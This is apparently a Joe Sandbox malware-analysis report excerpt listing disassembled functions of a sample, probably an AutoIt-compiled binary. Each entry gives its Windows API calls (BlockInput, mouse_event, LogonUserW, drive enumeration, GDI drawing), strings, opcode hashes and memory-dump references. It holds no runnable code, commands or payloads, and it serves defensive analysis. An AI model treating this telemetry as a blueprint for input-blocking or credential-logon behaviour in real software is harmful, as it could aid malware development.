                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                              • String ID:
                                                              • API String ID: 2893107130-0
                                                              • Opcode ID: 9a4e6877867015273d790b47e55b46dd6298b95b84bdd2baa550af80c427ef0c
                                                              • Instruction ID: 3faa71ce3e4f8529703813229436b8aa64115df12aa1281d77c925d745d72a7c
                                                              • Opcode Fuzzy Hash: 9a4e6877867015273d790b47e55b46dd6298b95b84bdd2baa550af80c427ef0c
                                                              • Instruction Fuzzy Hash: 052172726345108BC729CF68C881A62B7E1EB95710B258E6DE4E5CB2C0CB78B945DB54
                                                              Function 00B06AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • BlockInput.USER32(00000001), ref: 00B06ACA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BlockInput
                                                              • String ID:
                                                              • API String ID: 3456056419-0
                                                              • Opcode ID: 0427fcd6915a0b086ee5d7ee2a2eb04c9876e53c5efae54ab43df23ff455b938
                                                              • Instruction ID: f22ae5a95b10a776e670eaa4a9e1fc0daed922337299729faed0fc9f6e982962
                                                              • Opcode Fuzzy Hash: 0427fcd6915a0b086ee5d7ee2a2eb04c9876e53c5efae54ab43df23ff455b938
                                                              • Instruction Fuzzy Hash: BEE012353002046FC700EB69D505E9ABBECAF64761B048456E945D72A1DAB0E8048B90
                                                              Function 00AF74BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00AF74DE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID:
                                                              • API String ID: 2434400541-0
                                                              • Opcode ID: a70025935f12a5127a9ff0d7e7837f641ac1b2fe952ac057e7b98bd764ac630d
                                                              • Instruction ID: 2b3381fed5d8414fc32158e76e8b707618276e55ff5944d57f11f96299739a68
                                                              • Opcode Fuzzy Hash: a70025935f12a5127a9ff0d7e7837f641ac1b2fe952ac057e7b98bd764ac630d
                                                              • Instruction Fuzzy Hash: 9ED09EA566C70D79ED2987A49C1FF7E1919F3007C3F949189B782CA4C1B89068459132
                                                              Function 00AEB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AEAD3E), ref: 00AEB124
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              • Opcode ID: a560cfb4c9543ede454ec6d700f1af39e6cb72a350ec8de1b8d7a087e237c3e6
                                                              • Instruction ID: 7de5cc01549a5ba7d9c2325d3acf3d1727caae872cdf9f1dd2f93409e46e2111
                                                              • Opcode Fuzzy Hash: a560cfb4c9543ede454ec6d700f1af39e6cb72a350ec8de1b8d7a087e237c3e6
                                                              • Instruction Fuzzy Hash: C0D05E320A460EBEDF024FA4EC02EAE3F6AEB04B00F408110FA11C60A0C771D531AB50
                                                              Function 00B2B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 709183b78427789237e77f75176d3600ee07a071337635cf71fb54900eaa0fd0
                                                              • Instruction ID: ebc4b9ca82f9e35099edc49aad07d7d9fea7018593a1822fee546aff11fd768c
                                                              • Opcode Fuzzy Hash: 709183b78427789237e77f75176d3600ee07a071337635cf71fb54900eaa0fd0
                                                              • Instruction Fuzzy Hash: 0CC04CB1400119DFC755DBC0DD849EEB7BCAB04701F204191A105F2110DB709B459B72
                                                              Function 00AD8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00AD818F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 24f4b2e7b0a4c7fd0021c9cacd084f9b5eed09bfe0db11b35f0b864b1d78149b
                                                              • Instruction ID: b9270b484dbe80be27b788d025cf2fd0a6d174c8cd9f163d18f5b20362228d7f
                                                              • Opcode Fuzzy Hash: 24f4b2e7b0a4c7fd0021c9cacd084f9b5eed09bfe0db11b35f0b864b1d78149b
                                                              • Instruction Fuzzy Hash: 65A0113000020CAB8F002B82FC088883F2CEA002A0B200020F80C020208B22A8208A8A
                                                              Function 00ABE3B0 Relevance: .5, Instructions: 540COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d019c66a612b3243af6f3469093aebbcd0fcd17a584c86b8ce681b4afc92cf41
                                                              • Instruction ID: ecd2c86e24113863ec5e095195ec3110100d8f57c1360cb469a6fc21f09c24ef
                                                              • Opcode Fuzzy Hash: d019c66a612b3243af6f3469093aebbcd0fcd17a584c86b8ce681b4afc92cf41
                                                              • Instruction Fuzzy Hash: BB22CC70A04219CFDB24DF58C490BEAB7F9FF18310F148169E95AAB352E735AD81CB91
                                                              Function 00AB93F0 Relevance: .5, Instructions: 531COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c5e476872ee490568e7cad3d68d090ea534fe37632a66f7ed1bfcc85b3935da
                                                              • Instruction ID: 9cb478f28b27a7ca330bf4205fde513abb11947eef61339beed4448541e170c7
                                                              • Opcode Fuzzy Hash: 5c5e476872ee490568e7cad3d68d090ea534fe37632a66f7ed1bfcc85b3935da
                                                              • Instruction Fuzzy Hash: 09128D70A00219AFDF14DFA5DA95AEEB7F9FF48300F104569E80AE7251EB35AD14CB50
                                                              Function 00ABAF50 Relevance: .5, Instructions: 514COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3728558374-0
                                                              • Opcode ID: 2cd87794872b4eb929536b713f8e9147e9ced2e6c11d1f2775021fc3f8c2cb46
                                                              • Instruction ID: 3aa6149fa642941c37c72dc33e35d8e5631eb080da5c5985e80bdd4fd0064641
                                                              • Opcode Fuzzy Hash: 2cd87794872b4eb929536b713f8e9147e9ced2e6c11d1f2775021fc3f8c2cb46
                                                              • Instruction Fuzzy Hash: 67029370A00109EFDF14DF68D991AAEB7F9EF48300F1180A9E80ADB256EB75DD15CB91
                                                              Function 00AD02A4 Relevance: .3, Instructions: 345COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                              • Instruction ID: 5ba4d91c8cabbec501bae9f2d2df49350aa848425c5378f781b78d82c9680015
                                                              • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                              • Instruction Fuzzy Hash: D1C194362051970EDF2D473A8834E3EBAA15AA17B171B176ED8B3CB6D5EF20C524D620
                                                              Function 00AD06D9 Relevance: .3, Instructions: 341COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                              • Instruction ID: f2e3d039ef42c28f12d19140a0015b3eb13a7d3273c27c6361237bb84aca2a5b
                                                              • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                              • Instruction Fuzzy Hash: 85C1C3362051970DDF2D473AC834A3EBAA15AA2BB171B076ED4B3CF6D5EF20C524D620
                                                              Function 00ACFE6F Relevance: .3, Instructions: 331COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                              • Instruction ID: 23b878952927290e4db0d2c4ef2f6746c8d107ce38cd776e9babf81239ac54f1
                                                              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                              • Instruction Fuzzy Hash: 14C1A3362051970EDF2D473A8834A7EFAA25AA27B171B077ED4B3CB5D5EF20C524D620
                                                              Function 00ACFA57 Relevance: .3, Instructions: 323COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction ID: dd28ef314b82bac9b070035c28d7cfdf099e9c583490475b05f650c33b6e023e
                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction Fuzzy Hash: CAC192362090970DDF2D473AC874A3EBAA25AA2BB531B077DD4B3CB5D5EF20C564D620
                                                              Function 00B1D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 00B1D2DB
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00B1D30C
                                                              • GetSysColor.USER32(0000000F), ref: 00B1D318
                                                              • SetBkColor.GDI32(?,000000FF), ref: 00B1D332
                                                              • SelectObject.GDI32(?,00000000), ref: 00B1D341
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00B1D36C
                                                              • GetSysColor.USER32(00000010), ref: 00B1D374
                                                              • CreateSolidBrush.GDI32(00000000), ref: 00B1D37B
                                                              • FrameRect.USER32(?,?,00000000), ref: 00B1D38A
                                                              • DeleteObject.GDI32(00000000), ref: 00B1D391
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00B1D3DC
                                                              • FillRect.USER32(?,?,00000000), ref: 00B1D40E
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00B1D439
                                                                • Part of subcall function 00B1D575: GetSysColor.USER32(00000012), ref: 00B1D5AE
                                                                • Part of subcall function 00B1D575: SetTextColor.GDI32(?,?), ref: 00B1D5B2
                                                                • Part of subcall function 00B1D575: GetSysColorBrush.USER32(0000000F), ref: 00B1D5C8
                                                                • Part of subcall function 00B1D575: GetSysColor.USER32(0000000F), ref: 00B1D5D3
                                                                • Part of subcall function 00B1D575: GetSysColor.USER32(00000011), ref: 00B1D5F0
                                                                • Part of subcall function 00B1D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B1D5FE
                                                                • Part of subcall function 00B1D575: SelectObject.GDI32(?,00000000), ref: 00B1D60F
                                                                • Part of subcall function 00B1D575: SetBkColor.GDI32(?,00000000), ref: 00B1D618
                                                                • Part of subcall function 00B1D575: SelectObject.GDI32(?,?), ref: 00B1D625
                                                                • Part of subcall function 00B1D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00B1D644
                                                                • Part of subcall function 00B1D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B1D65B
                                                                • Part of subcall function 00B1D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00B1D670
                                                                • Part of subcall function 00B1D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B1D698
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 3521893082-0
                                                              • Opcode ID: 3b3eef7364361bf81ffd2f674545252695c06ce7c62f3787c5af7711ea4c6640
                                                              • Instruction ID: b6f11fbf5b896c96711368371b3ff955d32d9cd29f9251d9bd8261ab76c728e3
                                                              • Opcode Fuzzy Hash: 3b3eef7364361bf81ffd2f674545252695c06ce7c62f3787c5af7711ea4c6640
                                                              • Instruction Fuzzy Hash: A4915E72408701BFDB109F64EC48AAFBBE9FB85325F600A19F562971E0DB71D944CB52
                                                              Function 00ACB8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32 ref: 00ACB98B
                                                              • DeleteObject.GDI32(00000000), ref: 00ACB9CD
                                                              • DeleteObject.GDI32(00000000), ref: 00ACB9D8
                                                              • DestroyIcon.USER32(00000000), ref: 00ACB9E3
                                                              • DestroyWindow.USER32(00000000), ref: 00ACB9EE
                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B2D2AA
                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B2D2E3
                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00B2D711
                                                                • Part of subcall function 00ACB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ACB759,?,00000000,?,?,?,?,00ACB72B,00000000,?), ref: 00ACBA58
                                                              • SendMessageW.USER32 ref: 00B2D758
                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B2D76F
                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 00B2D785
                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 00B2D790
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                              • String ID: 0
                                                              • API String ID: 464785882-4108050209
                                                              • Opcode ID: 5cff4b1ea0dbf3b757128f11066e69879651449cd0648d5991d9a94fff3cfbf6
                                                              • Instruction ID: a83ac30c75d539d8ef6db7c8998be1ae99674524a2f2c894ec3a09609cc6be3e
                                                              • Opcode Fuzzy Hash: 5cff4b1ea0dbf3b757128f11066e69879651449cd0648d5991d9a94fff3cfbf6
                                                              • Instruction Fuzzy Hash: 8D127A306042219FDB25DF28E985BA9B7F5FF15304F1445ADE999CB262CB32EC41CBA1
                                                              Function 00AFDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 00AFDBD6
                                                              • GetDriveTypeW.KERNEL32(?,00B4DC54,?,\\.\,00B4DC00), ref: 00AFDCC3
                                                              • SetErrorMode.KERNEL32(00000000,00B4DC54,?,\\.\,00B4DC00), ref: 00AFDE29
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              • API String ID: 2907320926-4222207086
                                                              • Opcode ID: a8b85c6ba59f4bd5a312cb5e82a2d76795c7a8ac14dee44bafc676f35a4f1f47
                                                              • Instruction ID: db5bb81eb692aa55aa031ed31ce398a5efad6e2cfc81a500e31a18519c122f40
                                                              • Opcode Fuzzy Hash: a8b85c6ba59f4bd5a312cb5e82a2d76795c7a8ac14dee44bafc676f35a4f1f47
                                                              • Instruction Fuzzy Hash: 4D51C43024930AEBC215EFA4C981A79B7F2FB94B04B28495DF2079B2A2DB74D945D742
                                                              Function 00ABCC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 1038674560-86951937
                                                              • Opcode ID: 36fe6bebdc340f31119d0cfabe2bb98d9f6882f55f115415982c3c0c5d474f67
                                                              • Instruction ID: ba7482ec75bc3c1c668619ef855c7f3473e810446e4cf8ede77c3041decea5cf
                                                              • Opcode Fuzzy Hash: 36fe6bebdc340f31119d0cfabe2bb98d9f6882f55f115415982c3c0c5d474f67
